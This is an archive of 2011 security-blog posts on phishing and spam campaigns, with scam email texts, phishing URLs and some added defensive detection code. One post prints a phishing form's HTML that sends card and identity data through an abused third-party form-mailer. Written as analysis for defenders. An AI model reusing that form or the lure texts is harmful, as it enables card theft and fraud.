Tag Archive | "Phishing"

Cyber Crooks All Set to Crash the British Royal Wedding

As we have seen with many major events in the past, news of the British Royal Wedding is currently being used by cyber criminals to bolster their spam campaigns and push rogue antivirus software through black hat search engine optimization (SEO) techniques.
 

Spam campaigns

We have blogged previously about “snowshoe” spammers targeting the upcoming British Royal Wedding of Prince William and Kate Middleton. Spam email messages advertising a replica of Princess Diana’s engagement ring that were observed in February are still making the rounds on the Internet, and the eve of the royal wedding is now upon us. Furthermore, as we had anticipated, we have recently observed additional spam campaigns making use of this significant event to promote various products.

In one such recent spam campaign, email promoting a “limited edition Buckingham Mint Royal Wedding Commemorative Coin” at a discounted rate is being observed:


 
The IP address involved in this particular spam attack belongs to a domain owned by an email marketing company based in the UK. The link in the body of the email first briefly redirects to the domain lpmtrk.info (created on January 14, 2011) before redirecting to the final destination site. This domain was registered using a domain privacy service to obscure the registrant's identity so that it could be used for spamming activities.

In another spam campaign, limited edition customizable mugs and t-shirts are being promoted at a discounted rate:
 

 

Sample “From” and “Subject” lines observed in these and related spam attacks are listed below:

From: Sovenir <souvenir@yahveh.permissionalert.com>
From: Sovenir souvenir@ardent.informationfoot.com
From: “Timeless Royal Ring” <royalring@yinstenarm.com>
From: “British Heirloom Ring” <royalring@yinstenarm.com>

Subject: Get a limited-edition royal wedding mug now
Subject: Get A Limited Edition Royal Wedding T-Shirt Now
Subject: Share in the most anticipated wedding of the century
Subject: A Beautiful Simulated Sapphire Ring

The domains that are linked to the above email addresses are spammer-owned domains created recently, most likely for spamming purposes. The two domains used in the email addresses above were registered on April 7, 2011, to the same registrant. The links in the above spam emails first redirect to the domain linked to the email address before redirecting to the actual spam website. Spammers have also included opt-out links (not included in the screenshots above), which are most likely bogus.

The IP addresses involved in the above spam messages are traced back to the United States. These IP addresses have been blacklisted due to their past involvement in spam campaigns. Rest assured, Symantec Brightmail filters are in place to block these and related spam email attacks.
 

Black hat SEO

With only one day left before the “big day,” searches related to the Royal wedding are gaining momentum on the Web. Black hat SEO techniques are being used in “fake” pages to lure people looking for news related to the royal wedding.

At one point, a search for “william and kate movie imdb” returned 61 malicious links in the first 100 search results. Fifty-eight of the first 100 results for the search term “princess diana death photos” and 45 of the first 100 results for the search term “royal wedding guest list kanye” also led to malicious sites.

Screenshots of the search results for the term “royal wedding gown sketches” are shown below, in which Norton Safe Web indicates 6 of the 8 links are malicious:


 
Some of these poisoned pages receive very high search engine rankings, and appear in the first page of search results. The following screenshot shows a malicious URL appearing as the first link in the results (right below the news links) for the term “Royal wedding time.”

Norton Safe Web (safeweb.norton.com) provides a detailed threat report for sites rated red or yellow:

Here are some other search terms currently returning poisoned links:

* william and kate movie cast
* prince charles age
* princess diana death facts
* prince harry last name
* william and kate movie on lifetime
* royal wedding guest list bush
* royal wedding guest list snubs
* prince charles siblings
* the royal wedding date and time

We have seen over 500 compromised sites being used in this campaign over the past few days. Attackers create multiple fake pages on each site and use unethical SEO techniques, such as keyword stuffing, cloaking, and link farming, to “game” the search engine algorithms and achieve high search engine rankings.

These poisoned links generally have the following pattern:

hxxp://<domain name>/<random 2 character string>-<search keyword>

Most of these poisoned links redirect (307 Temporary Redirect) to co.cc domains that host rogue antivirus software. We came across 11 different co.cc domains being used in this campaign so far.
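The two observations above (the `/<two random characters>-<search keyword>` path shape and the 307 redirect to a co.cc host) are enough to build a simple proxy-log check. The following is an added example written for this page, not code from the original post or from Symantec; the log format and all hostnames are constructed placeholders, and the `.co.cc` suffix is the one the post reports.

```python
import re
from urllib.parse import urlparse

# Path shape described in the post: /<2 random characters>-<search keyword>
POISONED_PATH = re.compile(r"^/[a-z0-9]{2}-[a-z0-9]+(?:[-+_][a-z0-9]+)*/?$", re.IGNORECASE)


def looks_like_poisoned_path(url):
    """True when the URL path matches the <2 chars>-<keyword> shape."""
    return bool(POISONED_PATH.match(urlparse(url).path))


def is_rogue_av_redirect(status, location):
    """True for a 307 redirect whose target is a co.cc host, the hop reported in the campaign."""
    if status != 307 or not location:
        return False
    host = (urlparse(location).hostname or "").lower()
    return host == "co.cc" or host.endswith(".co.cc")


# Constructed proxy log lines (hypothetical format): client method url status location
SAMPLE_LOG = """\
10.0.0.5 GET http://compromised-site.example.test/qx-royal-wedding-gown-sketches 307 http://scanner-placeholder.co.cc/scan.php
10.0.0.5 GET http://scanner-placeholder.co.cc/scan.php 200 -
10.0.0.9 GET http://news.example.test/2011/04/royal-wedding 200 -
10.0.0.9 GET http://compromised-site.example.test/ab-prince-charles-age 307 http://another-placeholder.co.cc/index.php
10.0.0.7 GET http://shop.example.test/zz-sale 302 https://shop.example.test/sale
"""


def find_poisoned_hits(log_text):
    """Return (client, url, location) for requests that match BOTH the path shape
    and the 307 -> co.cc hop; either signal alone produces false positives."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed lines rather than crash
        client, _method, url, status, location = parts
        location = None if location == "-" else location
        if looks_like_poisoned_path(url) and is_rogue_av_redirect(int(status), location):
            hits.append((client, url, location))
    return hits


if __name__ == "__main__":
    for hit in find_poisoned_hits(SAMPLE_LOG):
        print("poisoned result followed:", hit)
```

The last sample line shows why the two checks are combined: `/zz-sale` matches the path shape, but a 302 to the site's own HTTPS host is ordinary behaviour and is not reported.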

The screenshot below shows the usual fake scanning/rogue antivirus activity that claims a whole bunch of serious errors and threats need to be cleaned from your computer:

When searching for information on the Internet, make sure your legitimate antivirus software is updated and be wary of scam pages asking you to download “antivirus” software.

Symantec’s multilayered protection technologies provide coverage for all of these attacks. The Norton Safe Web toolbar identifies and blocks poisoned search results.

 

Norton survey results

Our Norton team at Symantec recently conducted a Royal Wedding survey. The results of the survey were released on April 18, 2011, and they exhibit some interesting facts, as listed below, as well as some that were quite shocking:

* 62% of Americans surveyed are likely to follow the British royal wedding.

* 87% of those surveyed responded that, as of March 25, they were already following the news about the upcoming wedding.

* Moreover, one-third of respondents will seek their royal wedding news online, making them more susceptible to online scams and other threats.

* One-quarter of respondents said they are interested in the royal wedding primarily because they love the notion of royalty with all its pomp and ceremony.

* Nearly 1 in 4 said their primary reason for following the wedding is because they want to see the lavish decorations, food, and clothing.

Royal Wedding 2.0 – The first “e-royal wedding”

* Nearly 40% of all respondents will seek their royal wedding information online.

* 67% of 18-34 year olds will seek their royal wedding information online.
            
* 87% of 18-24 year olds will seek their royal wedding information online.

* More than a quarter of respondents will be watching the wedding on a computer, laptop, or mobile device, either live or recorded.

* 53% of respondents will potentially share their thoughts about the royal wedding online (e.g., social networks, micro-blogs, and blogs).

People are unaware and unprotected from cybercriminal “wedding crashers”

* 18-34 year olds are more than twice as likely to not have security software (or not know if they do) on their laptop or computer than those 45 or older.

* 87% of 18-24 year olds seek their royal wedding information through online channels, and, shockingly, that same proportion of 18-24 year olds don’t know what search engine optimization (SEO) poisoning is, or how it affects them.

—————————————

Note: This blog has been researched and written by Symantec’s Suyog Sainkar, Nithya Raman, and Helen Malani.

Posted in Symantec

New spamvertized campaign theme

The wave of United Parcel Service, DHL Global and Post Express Office spam – which has been so prolific and has been leading to scareware infections – changed to Bobijou Inc. over the Easter weekend.

However, the first batch sent out was flawed. As you can see below, the file attached has a “.dat” extension.

The mistake was rectified on Monday, with a proper zipped attachment:

Once extracted, the file looks like a PDF document but is in fact an executable:

Detection rates are not bad, although leading AV vendors still let it get through to the Inbox.

Bobijou is a famous British pearl jewellery brand. I wonder why pick on a jeweler? Is it because of the upcoming Royal Wedding?

Jerome Segura

Posted in Security

More fake Twitter emails

It’s been over a month since we wrote about fake Twitter email messages, and if it worked once for scammers, they’ll certainly try it again. Commtouch labs is seeing large quantities of – you guessed it – fake Twitter email messages, similar to the one here:

How can the uninitiated determine that it’s not a real message from microblogging service Twitter? Well, the typo in the subject and body gives the first clue (it should say “2 direct messages”, not “message” in the singular – but that’s just petty). The really easy way to tell is to simply mouse over the “twitter” URL and look for the real URL, which will show up either at the bottom of the window or right over the cursor, depending on your email program. If the real URL is not a Twitter URL, then it’s definitely a scam.

I can’t even tell you what this particular message was trying to get from its recipient since by the time I clicked the link — less than 24 hours after it had been received — the link was already dead. Past fake Twitter messages have been pharmacy spam, but since the site was already taken down it may have been phishing. A short-lived landing page is also a surefire sign that the email is not legit. Real web sites typically keep their landing pages around for a long time — practically forever, in fact — since no marketer wants to take the chance that someone will open their mail several weeks after it’s been sent, execute the sought-after act of clicking through, and then have this enchanted potential customer land on a non-existent page. Phishers and scammers, however, are always trying to outrun security software and the law, and one of the ways they try to do so is to keep their sites up for a very short time. They flood inboxes with messages linking to the ephemeral scam/phish landing page; anyone they can convince to click through in the short time the page is live is caught, and anyone who opens the email after the site is taken down has been saved from the scam simply by being slow to open their email.

Posted in Commtouch

The Rise of the Targattacks*: Cyber espionage and sabotage: the new way – *Abbr.: targeted attacks

During the last 18 months we have seen a growing number of targeted attacks against numerous companies and organizations. Let’s briefly have a look at some of them:

  • The Aurora Attack: an attack that began in mid 2009 and continued until December 2009. The primary goal of this attack was to gain access to high tech, security and defense companies and potentially modify source code repositories, for example at Adobe, Juniper, Google, Yahoo, etc.
  • German Emissions Trading Authority (DEHSt): suffered from phishing attacks carried out in January 2010. Scamsters circulated fraudulent emails masquerading as email from the DEHSt and persuaded the recipients to log in to a counterfeit website, ironically to protect themselves against alleged hacker attacks. Using the stolen access data, the attackers transferred emissions permits, primarily to Denmark and Great Britain, and in so doing allegedly gained up to three million Euros illegally. It is readily apparent that targeted phishing attacks can be very lucrative.
  • Stuxnet: a Windows computer worm discovered in July 2010 that targets industrial SCADA software and equipment with the aim of attacking an Iranian nuclear plant. The attack seems to have been successful, as the enrichment of uranium was heavily delayed.
  • G20 Files attack: was announced in March 2011 but had already been going on for several months. The G20 is made up of the finance ministers and central bank governors of 19 countries and discusses key issues of the global economy. Over 150 ministry computers of the G20 were attacked. The attacks aimed at files related to the G20 meetings.
  • RSA breach: RSA is a well known security company specialized in identity and access solutions. Hackers may have gained access to part of the code generation algorithm used in RSA SecurID tokens. At least some information was extracted, but it is still unclear whether it will actually cause future problems.
  • EU Commission Summit attack: this was a targeted attack against some specific servers at the EU Commission in Brussels, found and stopped before the EU March 2011 Summit. As not much is known about it, we suppose that nothing important has been leaked.
  • Epsilon email breach: Epsilon is a well known online marketing company that works with hundreds of large companies around the world and stores millions of email addresses in its databases. Hackers have stolen customer email addresses and names belonging to a “subset of its clients”. Some big companies such as Disney, Citibank, Verizon, etc. were involved.

 

And this list is still not complete.

What do they all have in common? It is a fact that all attacks were targeted at a specific organization, industry or company. Most of these targeted attacks were looking for confidential information. With the RSA attack they were looking for intellectual property. Stuxnet was an exception, as cyber sabotage seemed the real motivator. Sometimes it is very difficult to figure out the motive. Sometimes it is even difficult to estimate whether the attack was successful or not, as this depends on the attacker’s intentions. Above all, social engineering has been used in all of these cases, ranging from specially crafted emails (spear phishing) to the use of infected USB sticks – but all of this involved human action.

Nevertheless, all these attacks or breaches illustrate the new reality concerning security: cyber espionage, like cybercrime, is simple to perpetrate but a lot more difficult to spot. There is hardly any risk involved if you compare it to the more traditional methods. This is the new front line – including attacks against military facilities as well as politically and financially motivated attacks.

As some of the attacks were quite successful, we expect the number of targeted attacks to keep growing, as the cybercriminals now have access to more email addresses and new targets to direct their attacks at. A rise in specific targeted phishing mails is only one thing to watch out for in the coming months.

But what have we learnt?

  • All systems can be attacked, even systems not connected to the internet or autonomous networks protected by a gateway.
  • Every system requires updates for the installed software (Flash, Adobe, OS, etc.).
  • Even if the gateway is protected you still require protection on the internal systems regardless of whether there is important data on them or not.

The combination of social tricks against humans and outdated software on their systems is the key issue in these attacks. Unfortunately, this was also the same problem 10 years ago. Needless to say, we require good security software in place, but if we don’t change our mindset or improve the way we are updating, we still have a long way to go before we win the battle, as this problem will continue to grow in the future.

During our Infosec UK presentation and some other lectures this year we will elaborate on this growing problem.

Posted in G Data

Spammers Intend to Make You an Easter Bunny

Easter is a Christian holiday centered on the death of Jesus Christ and His subsequent resurrection several days later. Hence Easter is an important holiday for Christians. But what gets associated with Easter is beautifully decorated Easter eggs found in every decorated shop window this season, and of course the Easter Bunny! To celebrate Easter, people exchange Easter eggs and, over time, this has grown to include personalized e-cards and personalized gifts. Spammers have begun to exploit the season by sending personalized e-cards, gift cards, and replica-spam emails.

Here is a screenshot of a personalized Easter e-card:

Here are some of the headers used in Easter e-card spam:

Subject: Give your child the gift of amazement A Package from The Easter Bunny.

Subject: The Most Popular Gift for Kids this Easter 2011

Subject: Send A Personalized Easter Bunny Letter

Subject: How To Make This Your Childs Best Easter Ever.

Subject: This is the secret to making your kids happy this Easter.

Subject: Personalized Easter Bunny Letters

From: “The Easter Bunny” <The.Easter.Bunny@removed.com>

From: “Easter Bunny” <Easter.Bunny@removed.com>

Where personalized Easter gifts are concerned, spammers have targeted replica products offers at unimaginable discounts (as shown in the image below). To create a frenzy, they have also suggested that they have limited stock and therefore one must “HURRY”! But do not get carried away with such false promises. This could be bait used by the spammers to get a hold of the user’s personal information.

Screenshot of the Web site selling fake replica watches:

As Symantec wishes all our readers a very happy Easter, we also advise you to be cautious when handling unsolicited or unexpected emails, especially during this Easter season. Updating antispam signatures regularly protects your personal information from being compromised.

Thanks to Anand Muralidharan for contributed content.

Posted in Symantec

Western Union hack tool: real or hoax?

When something sounds too good to be true I always take it with a grain of salt.

I came across this tool that “can be used to make western union transfers without any credit card. You even don’t need any phone verification. Also the processes very much secured.” {sic}

Taken from: wubug.org

Supposedly, it can hack Western Union’s databases by changing the receiver’s name, create new money transfers etc.

This program sells for $250 and comes with one year free support.

The organisation that sells this tool also provides web hosting services for spammers, starting at $25/month:

“WUBUG Developers provide web hosting for spammers. We do not care what content you upload. Warez, spam pages, credit cards hacker, upload any thing. We will never suspend your account for such abusive uses.” {sic}

Now, I can’t verify if any of this is real or not. If you can, please let me know (via Twitter, @jeromesegura, as the comments on this blog are currently broken) and I will update this post.

To end this story, I would like to quote the disclaimer that these guys have printed on their website:

“Please don’t use any information in this website for illegal activities. We will report the the persons involve in illegal activities.” {sic}

They obviously have a good sense of humour.

Update:

A Spanish blog picked up this story and mentioned that the file was detected by most AV vendors on VirusTotal, confirming it is not only a hoax but also malware.

- Jerome Segura

Posted in Security

Boxes of Money !

Phishing and 419 scams have been around for a while now. However, sometimes they never cease to amaze when it comes to their tactics. We caught this most recent one in one of our Honeypots and thought we would share due to the “over-the-top” images sent.

 

Also note the horrific markup of the passport. 

—————————————————————————–

 

Email sent from: usermail.uni-ak.ac.at ([193.170.136.34])

Email Subject: urgent response

Email body:

Apologies for having to reach out to you like this, my name is Gideon Kerkula am from Liberia, I and my mother just arrived with 2 inherited trunk boxes which our late father kept in our under ground flat which we discover and we collected money from it and I took picture with the two trunk boxes, we need your help to clear the money from the custom and help us invest it in any profitable investment that will last for a life time, the US$35,000 we collected from the boxes we use it for clearance on Ivory Coast- Abidjan border and the settlement of the military and police force on the highway. Please I want you to keep it confidential between us.

 

I have also attached my passport and the picture I took with the 2 trunks boxes, please if there’s anything you don’t understand or you want to know, ask and we will enlighten you.

 

I appreciate and wait your response.Please reply to this email;GideonKerkula@removed.cn

 

Thanks,

 

Gideon kerkula

 

—————————————————————————–

 

Images that were attached:

 

 

You would have thought Gideon would have given up at this point – however, there is a follow-up.  Brace yourself for the sequel:

 

————————————————————————-

From: Kelvin Kerkular [mailto:kkelvin1979@removed.cz]
Sent: 07 April 2011 06:44
Subject: PRIVATE AND CONFIDENTIAL

From:
Kelvin and Vivian
Tel:233 26 750 6123

Dear Beloved,

My name is Kelvin Kerkular I am 32 years old, and my junior sister name is Vivian Kerkular, 29 years old, we are Citizens of Liberia, currently residing in the refugee camp in Ghana. I am contacting you solely on a business related issues.

I became an orphan some couple of years ago. I am contacting you about a need I have and I believe you are well able to help me after my severe and fervent prayer for God to link me up with some one who will be capable of helping me out from Ghana as my foreign beneficiary. It all depends on our trusting each other but I’ve chosen to contact you prayerfully and believing that you are the person that can help me.

The source of my parent’s death was believed to be from our detractors who are never happy that he was making so much progress. The issue is that my parents are diamond merchants in my country Liberia and they made too much money from the business, that prompted the government of Liberia to probe them.

For this reasons, during the crisis in Liberia, our home was among the first target by the Liberian rebels. They allegedly said that, my late parents have a close relationship with former president of Liberia President Charles Taylor) that was their reason of storming our home. My mother died immediately they storm our resident and my father sustained serious bruises that he could not survive while in the hospital. I and my younger sister Vivian managed to escape during the incident. As i am talking to you now, i and my younger sister are staying in Ghana for some obvious reasons that i will like to relay to you on your response to this message.

This is a confidential matter i will like to discuss with someone whom my spirits accepted to deal with. Because after my parents exit, the government of Liberia have taken over all of our belongings. They have also emptied my parents bank accounts left alone with a deposit which my late father made in a nearby country called Ghana during his trade to Ghana. No one knows of this deposit, it is only me as the next of kin. And my father had earlier warned me not to disclose this issue to anyone before he died in the hospital after the incident that cause his death. Today I and my younger sister fend for ourselves here in Ghana.

And life has been very difficult since the government of Ghana started their deportation exercise which says that we refugees should evacuate their Bujumbura refugee camp to our various countries. Please my dear beloved, our plans now are to relocate from Ghana since we can not afford to go back to Liberia following our past experience as they killed our parents, but we will need to move out the fund left by my late father here in Ghana.
please according to my late father’s lawyer all we need now before these boxes can leave Ghana to  is your full contact information so as to enable the lawyer work out the papers that will back up the shipment to your location. Please i believe my lawyer will explain more better to you as soon as you come in contact with him.

Once you agree to help us move this fund, we will link you up with our late father’s lawyer who will help us in securing all the necessary documents for the shipment. As soon as we agree, we will come to your country where I and my sister will invest the money under your guide. So please let us know what will be your compensation or percentage for helping me and my sister out.

In the attached files, you will see a photograph picture which my late father took me before he made the deposit as a proof, and a picture of my sister, Vivian. Please the lawyer have not seen this picture as my father warned me not to disclose the content of the boxes to anyone except to some one whom i have chosen to be my foreign beneficiary, and also attached are the copies of the documents that is covering the fund in the keeping company, so i want you to go through them carefully. sometime ago there was a problem in the camp and my sister lost her Liberia passport but the lawyer agreed to get her a Ghana passport if we are ready to travel out of Ghana to meet with our foreign beneficiary.

Please NOTE that the earlier you help us the better as you will be doing Almighty God a great favor because our lives are no more safe with these people over here. I will need your reply stating your readiness to help in seeing this through.

We will be needing your details as follows:
(1) Your Full Names.
(2) Your Home or Office Address.
(3) Your cell phone Number.
(4) Occupation.
(5) Age.

Please feel free if you have any question to ask.

Thanks and be bless
Kelvin and sister.

————————————————————————-

And yup, you guessed it: more convincing attachments:

 

 

And finally, the cream of the crop: a convincing photo of Vivian, Gideon’s or (as he prefers in the second email message) Kelvin’s sister.

Well, Kelvin Gideon Kerkula if that is your real name… consider this. You have been named and shamed.  Unfortunately your overzealous tactics in an attempt to ‘social engineer’ or to convince me and everyone else do not work. 

I wonder what the next in the trilogy will be…

Of course Websense customers are being continually protected against phishing emails such as these with our Advanced Classification Engine, ACE.

Posted in Security

Bank of Baroda Phishing Scam

It’s now Bank of Baroda that is being targeted by phishing attacks.

A mail with the subject line “MESSAGE TO ALL BARODA CONNECT USERS!!!” is being circulated, containing an attachment.

If you open the attached htm file, it displays a Bank of Baroda login form. This form is rendered from your local machine, not from the bank’s web site.
It asks you to fill in confidential information such as Corporate ID, User ID, Password, etc.

We have analysed the htm file and found that it contains a fraudulent link, http://174.120.139.34/~buupy/images/log.php, and this is the link to which your confidential data is transferred.

Quick Heal successfully blocks the fraudulent URL and deletes the malicious htm file too.

Posted in Quick Heal


Phishing as we know it

Today, we’re going to look closely at a very good example of phishing. There’s probably no need to explain what phishing is, but just to be sure, here is the definition as you can find it on Wikipedia:

“Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication.”

Enough with definitions, let’s have a look at the particular example. The target of this scam is the clients of Česká Spořitelna, which is one of the biggest banks in the Czech Republic. So how could such a client be deceived?

Image 1: Typical phishing e-mail

The client receives a warning e-mail which seems to be sent by his bank. The e-mail informs him, e.g., about one unread message (as in this case) and offers a direct link to the client’s internet banking site. There’s no visible address of the target page, so the client simply clicks the link, which leads him… to his internet banking. At least it looks like his internet banking site. Let’s have a look at the differences:

Image 3: Phishing site on the left, original on the right – click the image for larger resolution

 

  1. The first thing the user should look for is a secure connection over the https protocol, which most banks use. If the site doesn’t use it, it is, at the very least, suspicious.
  2. Even if there is an https connection in use, the user should always check the web site address. In our case, the phishing site uses a very suspicious address: http://www.polevaultunlimited.com/blog/news/1/servis24.cz/ebanking-s24/dispatcher.htm?aid=19101203&lang=cs. There are two problems here: no HTTPS is used for secured transactions, which is the very common method for securing client data, and the web address itself is not very trustworthy either. However, in many cases the web address is very similar to the original one and the difference could be just one letter or the suffix (.org instead of .com, etc.).
  3. The other differences are just “cosmetics”. The attackers used the old phone number.
  4. The format of the phone numbers on the phishing site and the original site differs (but the phone numbers are the same).
  5. There are small graphical defects (as the attackers altered the content of the site), whereas big companies usually spend a lot of money to make their web sites “perfect”.
  6. This is probably the most conspicuous element and the user should notice it immediately. Unless you are paying for something via the internet, no serious company would ask you for your credit card number, let alone the CVC/CVV code. Ultimately, this is the main purpose of the whole scam – to get this information.
  7. Even though it looks like there are some links, they are not clickable. The attackers simply copied a picture of the original.
  8. The diacritics. Again, companies pay a lot of money to have their web sites perfect. Also, attacking an English-language web site is much easier than attacking a site written in some other language which actually uses diacritics. And if that language is not the native language of the attackers, you can bet there will probably be some mistakes.
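Points 1 and 2 above (HTTPS, and the real host rather than a look-alike) can be checked mechanically before a user ever types credentials. The function below is an added example for this page, not code from the original post or from AVG. It assumes, as a placeholder, that `servis24.cz` (the fragment the phishing URL buries in its path) is the genuine banking domain the client expects; substitute the bank's real host in practice.

```python
from urllib.parse import urlparse

# Assumed genuine banking domain (placeholder taken from the path fragment in the post).
EXPECTED_BANK_DOMAIN = "servis24.cz"

# URL quoted in the post, and a constructed look-alike of the other kind the post describes
# (bank name moved into a subdomain of a stranger's host).
PHISH_URL = ("http://www.polevaultunlimited.com/blog/news/1/servis24.cz/"
             "ebanking-s24/dispatcher.htm?aid=19101203&lang=cs")
LOOKALIKE_URL = "https://servis24.cz.login-placeholder.example.test/ebanking-s24/"


def host_matches(hostname, expected_domain):
    """True only when hostname IS expected_domain or a real subdomain of it.
    A plain substring test would accept 'servis24.cz.evil.test'; the suffix test does not."""
    return hostname == expected_domain or hostname.endswith("." + expected_domain)


def check_banking_url(url, expected_domain=EXPECTED_BANK_DOMAIN):
    """Return a list of findings; an empty list means both checks from the post passed."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    findings = []
    if parsed.scheme != "https":
        findings.append("no HTTPS")
    if not host_matches(host, expected_domain):
        findings.append("host %r is not %s" % (host, expected_domain))
        brand = expected_domain.split(".")[0]
        # The bank's name appearing in the path or inside a foreign host is the
        # classic decoy: it looks right in the address bar but the host is not the bank.
        if expected_domain in parsed.path.lower() or brand in host:
            findings.append("bank name appears in the path/subdomain, not as the real host")
    return findings


if __name__ == "__main__":
    for u in (PHISH_URL, LOOKALIKE_URL, "https://www.servis24.cz/ebanking-s24/"):
        print(u, "->", check_banking_url(u) or "ok")
```

The second check deliberately uses a suffix match rather than a substring match: the browser's address bar shows the whole URL, and users tend to stop reading once they see the bank's name, which is exactly what the path and subdomain tricks exploit.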

These are the differences and what the user should be aware of. Unfortunately, a lot of users ignore or just pass over these signs and the result is the loss of their money. In this particular case, you have to fill in all the fields (they’re mandatory) and there is even some basic checking of the data in those fields:

Image 4: Warning that the CVV / CVC code has to be 3 characters long

And what happens if you “successfully” gave your internet banking credentials or credit card number with CVV to the attacker? At least they’re polite and thank you for your data. They also ask you to be patient and inform you (with a strange word order) that the process will take the next two days to finish – so they’ll have a lot of time to rob your bank account. Finally, you are automatically transferred to the real bank web site, to an article about personal data protection… a bit ironic.

Image 5: Thank you, and please give us two days for robbing your bank account.

At the time of writing this blog the mentioned site is still alive. AVG flags this site as infected by the JS/Phish virus, and some web browsers may also warn you about the phishing attempt.

As usual, think about what you’re doing and where you are filling in your sensitive data. Using security products such as AVG will help you protect yourself, but you always have to think about what you are doing. Be safe.

Peter Gramantik & Hynek Blinka

Posted in AVG

HM Revenue & Customs phishing emails – continued

MX Lab, http://www.mxlab.eu, is intercepting tax refund phishing emails with the subject “Please Submit Your Payment Refund” and an attached HTML webpage. We reported this earlier, on January 27th, 2011, and this campaign is still running in a modified version.

The emails are sent from the spoofed email address srvcs@hmrc.gov.uk, and possibly other combinations, and have the following body:

Dear Applicant:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show that you have made over payments of GBP 178.25

Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In oder to process your refund you will need to complete the application form attached to this email.Your refund may take up to 6 weeks to process please make sure you complete the form correctly.

NOTE: If you’ve received an Income Tax ‘repayment’ it will either be following a claim you’ve made or because HM Revenue & Customs (HMRC) has received new information about your taxable income or entitlement to allowances. The refund may come through your tax code or as a payment and could relate to the current tax year or earlier years.

An Income Tax repayment is a refund of tax that you’ve overpaid. So, if you’ve paid too much tax for example through your job or pension this year or in previous years HMRC will send you a repayment. You’ll get the repayment by bank transfer directly to your credit or debit card.

————————————————————–

Copyright 2011, HM Revenue Customs UK All rights reserved.

Attached to the email is an HTML page with the name Refund_Form.htm. Once opened you will have a webform to submit your personal details together with your credit card details.

Looking at the HTML source code, we can see that the layout and images are taken directly from the http://www.hmrc.gov.uk/ web site. The form data itself is directed to hxxp://www.hotel-bergara.com/cgi-bin/mailform.cgi, a form-to-mail script on an unrelated third-party site. After submitting data you are redirected to the HM Revenue & Customs web site. The form's hidden values show us that the data is sent to govukgov@yahoo.com.

We also have a second example where the email contains a URL to the phishing web site instead of an HTML attachment.

Posted in Security

Spam or Phishing?

We always point out that phishing is just another form of spam, since nobody wants these emails. But what happens if a spam mail contains a spoofed URL which redirects you to a fake website? Isn't that a regular phishing mail then?

In my opinion, yes, this is phishing, and it isn't really new. For years we have seen phishing targeting Amazon and other big web shops. We are simply used to seeing the Rolex brand in spam advertising fake watches on obscure websites. This time the spammers went a step further and sent a phishing email abusing the Rolex name.

Unfortunately, the website was already down when we tried to analyze it. As usual, we recommend that our readers delete such emails, never visit the advertised websites, since they could contain malware as well, and never buy anything from such questionable websites.

Sorin Mustaca
Data Security Expert

Posted in Avira


Phishing Attack Uses Fake Donation Website

Earlier today, we found a phishing site that poses as a donation site to raise money for the victims of the recent earthquake in Japan. The phishing site http://www.japan{BLOCKED}.com was created using the open-source social networking system Jcow 4.2.1. It is hosted on the IP address 50.61.{BLOCKED}.{BLOCKED}, which is located in the United States. We've confirmed that the site is still active as of this writing.


Aside from hosting a phishing site, the cybercriminals behind this attack also abused the blog function of the website and inserted advertisement-looking posts, possibly to increase the site’s SEO ranking.


Such attacks are not uncommon: we have previously documented attacks that leveraged natural disasters such as Hurricane Katrina in 2005, Hurricane Gustav in 2008 and the Sichuan earthquake in China in 2008; the most recent one used the Haiti earthquake in 2010.

Users should remember to choose trustworthy organizations when it comes to handing over their donations.

The Trend Micro™ Smart Protection Network™, through its Web reputation technology, already blocks access to this phishing site even if a user is duped into clicking its link.


Post from: TrendLabs | Malware Blog – by Trend Micro

Posted in Trendmicro

Morrisons supermarkets subject for phishing campaign

MX Lab, http://www.mxlab.eu, started to intercept phishing emails targeting the online activities of the Morrisons supermarkets.

The emails have the subject "New Morrisons Offer", are sent from the spoofed email address "MORRISONS <noreply@morrisons.co.uk>" and have the following body:

This email is intended to inform you that there is a new offer at Morrisons Store.

This is a 2 weeks time offer. Register your card online and you will get 35% discount when using your card to pay in our stores.

In order to start the registration process please fill and submit the form attached to this email.

© Copyright Wm Morrison Supermarkets plc 2011. All rights reserved.

Attached to the email is the file Registration_Form.htm and once opened in a browser you will have the following screen:

The images and the web site style is taken from the official www.morrisons.co.uk web site but the form contents will be sent to hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi.

When examining the form code you will notice that this is also an abuse of a third-party CGI (Common Gateway Interface) form-mailer script:

<form style="margin: 0px;" action="hxxp://theburleyinn.co.uk/cgi-theburleyinn/form.cgi" method="post">
<input name="data_order" type="hidden" value="first_name,last_name,dob_d,dob_m,dob_y,mmn,address,city,state,zip,phone_number,
==================,document_type,document_no,issue_date,
==================,bank_name,name_on_card,card_number,exp_m,exp_y,cvv" />
<input name="submit_to" type="hidden" value="adw.gray@gmail.com" />
<input name="submit_by" type="hidden" value="abcdursulica@gmail.com" />
<input name="form_id" type="hidden" value="Morrisons Fulls 3" />
<input name="ok_url" type="hidden" value="http://www.morrisons.co.uk/Offers/" />

These guys have figured out the values that the CGI needs in order to process the web form. That is not too difficult either, because at http://theburleyinn.co.uk/contact.html the same CGI is called for the site's own contact form, and all the details are in that HTML page.

The major flaw in this CGI is that it takes the recipient (submit_to), the sender (submit_by) and the redirect target (ok_url) from hidden form fields, and performs no check on where the request comes from. At the very least it should reject requests that do not originate from the same web site or local hosting server; better still, the recipient and redirect target should be fixed on the server side so that no client-supplied value can change them (a Referer check alone is weak, since the Referer header is client-controlled). As it stands, anyone with basic knowledge can use it to send arbitrary mail to arbitrary recipients, for example a massive spam campaign.

Once the data is submitted on the phishing form, you will be redirected to the official site at http://www.morrisons.co.uk/Offers/.
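As an added example (not the MX Lab post's own code, and not the script on theburleyinn.co.uk, whose source is not shown here), the following Python sketches a form-mail handler with the same design flaw next to a hardened one. The hostnames, mailbox addresses and field names are assumptions chosen for the illustration; the submission dictionary is constructed to mirror the hidden fields quoted above, with the real Gmail addresses replaced by example.com ones. Neither handler talks SMTP: each returns the message it would send and the URL it would redirect to, so the behaviour can be checked offline.

```python
from email.message import EmailMessage
from urllib.parse import urlparse

# Constructed submission shaped like the hidden fields in the phishing form above.
# The addresses are assumptions (example.com), not the ones in the kit.
PHISH_POST = {
    "data_order": "first_name,last_name,card_number,cvv",
    "submit_to": "drop@example.com",
    "submit_by": "sender@example.com",
    "form_id": "Morrisons Fulls 3",
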